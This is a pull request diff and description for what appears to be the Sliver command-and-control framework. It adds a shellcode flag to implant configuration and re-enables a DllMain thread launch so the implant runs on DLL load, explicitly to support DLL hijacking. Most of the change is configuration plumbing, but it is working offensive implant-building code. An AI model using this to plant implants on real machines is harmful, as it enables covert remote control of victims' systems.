### PR TITLE
Differentiate shellcode from shared library to support DLL hijacking

### DIFF
--- a/client/command/generate.go
+++ b/client/command/generate.go
@@ -285,6 +285,7 @@ func parseCompileFlags(ctx *grumble.Context) *clientpb.ImplantConfig {
 
 	isSharedLib := false
 	isService := false
+	isShellcode := false
 
 	format := ctx.Flags.String("format")
 	var configFormat clientpb.ImplantConfig_OutputFormat
@@ -296,7 +297,7 @@ func parseCompileFlags(ctx *grumble.Context) *clientpb.ImplantConfig {
 		isSharedLib = true
 	case "shellcode":
 		configFormat = clientpb.ImplantConfig_SHELLCODE
-		isSharedLib = true
+		isShellcode = true
 	case "service":
 		configFormat = clientpb.ImplantConfig_SERVICE
 		isService = true
@@ -346,6 +347,7 @@ func parseCompileFlags(ctx *grumble.Context) *clientpb.ImplantConfig {
 		Format:      configFormat,
 		IsSharedLib: isSharedLib,
 		IsService:   isService,
+		IsShellcode: isShellcode,
 	}
 
 	return config

--- a/protobuf/clientpb/client.proto
+++ b/protobuf/clientpb/client.proto
@@ -79,6 +79,7 @@ message ImplantConfig {
 
   string FileName = 27;
   bool IsService = 28;
+  bool IsShellcode = 29;
 }
 
 // Configs of previously built implants

--- a/server/generate/binaries.go
+++ b/server/generate/binaries.go
@@ -118,6 +118,7 @@ type ImplantConfig struct {
 	// For 	IsSharedLib bool `json:"is_shared_lib"`
 	IsSharedLib bool `json:"is_shared_lib"`
 	IsService   bool `json:"is_service"`
+	IsShellcode bool `json:"is_shellcode"`
 
 	FileName string
 }
@@ -146,6 +147,7 @@ func (c *ImplantConfig) ToProtobuf() *clientpb.ImplantConfig {
 
 		IsSharedLib: c.IsSharedLib,
 		IsService:   c.IsService,
+		IsShellcode: c.IsShellcode,
 		Format:      c.Format,
 
 		FileName: c.FileName,
@@ -183,6 +185,7 @@ func ImplantConfigFromProtobuf(pbConfig *clientpb.ImplantConfig) *ImplantConfig 
 	cfg.Format = pbConfig.Format
 	cfg.IsSharedLib = pbConfig.IsSharedLib
 	cfg.IsService = pbConfig.IsService
+	cfg.IsShellcode = pbConfig.IsShellcode
 
 	cfg.C2 = copyC2List(pbConfig.C2)
 	cfg.MTLSc2Enabled = isC2Enabled([]string{"mtls"}, cfg.C2)
@@ -509,7 +512,7 @@ func renderSliverGoCode(config *ImplantConfig, goConfig *gogo.GoConfig) (string,
 		var fileName string
 		// Skip dllmain files for anything non windows
 		if boxName == "sliver.h" || boxName == "sliver.c" {
-			if !config.IsSharedLib {
+			if !config.IsSharedLib && !config.IsShellcode {
 				continue
 			}
 		}

--- a/sliver/sliver.c
+++ b/sliver/sliver.c
@@ -18,11 +18,13 @@ BOOL WINAPI DllMain(
     case DLL_PROCESS_ATTACH:
         // Initialize once for each new process.
         // Return FALSE to fail DLL load.
-        {
-            // HANDLE hThread = CreateThread(NULL, 0, Enjoy, NULL, 0, NULL);
-            // CreateThread() because otherwise DllMain() is highly likely to deadlock.
-        }
-        break;
+    {
+        // {{if .IsSharedLib}}
+        HANDLE hThread = CreateThread(NULL, 0, Enjoy, NULL, 0, NULL);
+        // CreateThread() because otherwise DllMain() is highly likely to deadlock.
+        // {{end}}
+    }
+    break;
     case DLL_PROCESS_DETACH:
         // Perform any necessary cleanup.
         break;

--- a/sliver/sliver.go
+++ b/sliver/sliver.go
@@ -18,7 +18,7 @@ package main
 	along with this program.  If not, see <https://www.gnu.org/licenses/>.
 */
 
-// {{if .IsSharedLib}}
+// {{if or .IsSharedLib .IsShellcode}}
 //#include "sliver.h"
 import "C"
 
@@ -84,7 +84,7 @@ func (serv *sliverService) Execute(args []string, r <-chan svc.ChangeRequest, ch
 
 // {{end}}
 
-// {{if .IsSharedLib}}
+// {{if or .IsSharedLib .IsShellcode}}
 
 var isRunning bool = false
 


### PR DESCRIPTION
This PR adds a `IsShellcode` param to the sliver config so that we can safely differentiate between a shellcode and a shared library.
So far, I had to disable the `RunSliver()` call in the DLL entry point, as it was causing issues when using sRDI to generate a shellcode. From now on, this issue should be fixed.

This PR also fixes #234 .